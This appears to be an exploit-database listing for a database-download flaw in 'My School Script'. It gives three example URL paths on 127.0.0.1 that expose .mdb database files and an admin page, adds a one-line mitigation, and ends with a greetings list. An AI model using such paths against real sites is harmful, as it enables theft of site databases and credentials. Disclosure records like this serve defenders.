header-logo
Suggest Exploit
vendor:
My School Script
by:
indoushka
N/A
CVSS
N/A
Data Base Download Vulnerability
Unknown
CWE
Product Name: My School Script
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: Unknown
Related CWE: Unknown
CPE: Unknown
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Unknown
Unknown

My School Script Data Base Download Vulnerability

An attacker can download the database files from the vulnerable web application by accessing the following URLs: http://127.0.0.1/My.School/odevsitesi.mdb, http://127.0.0.1/My.School/sayac.mdb, http://127.0.0.1/My.School/admin.asp

Mitigation:

Ensure that the web application is not exposing any database files to the public.
Source

Exploit-DB raw data:

========================================================================================                  
| # Title    : My School Script Data Base Download Vulnerability           
| # Author   : indoushka                                                                                                              
| # Home     : www.iqs3cur1ty.com 

| # Bug      : DB                                                           
======================      Exploit By indoushka       =================================
 # Exploit  : 
 

     1 - http://127.0.0.1/My.School/odevsitesi.mdb
     
     2 - http://127.0.0.1/My.School/sayac.mdb
     
     3 - http://127.0.0.1/My.School/admin.asp 
                    
Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * XproratiX * onurozkan * n2n * ========================
Greetz : 
Exploit-db Team
all my friend :
His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
www.owned-m.com * Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R http://www.ilegalintrusion.net/foro/
www.securityreason.com * Cyb3r IntRue (avengers team) * www.alkrsan.net * www.mormoroth.net
--------------------------------------------------------------------------------------------------------------

Navigation

Suggest Exploit

Services By CQR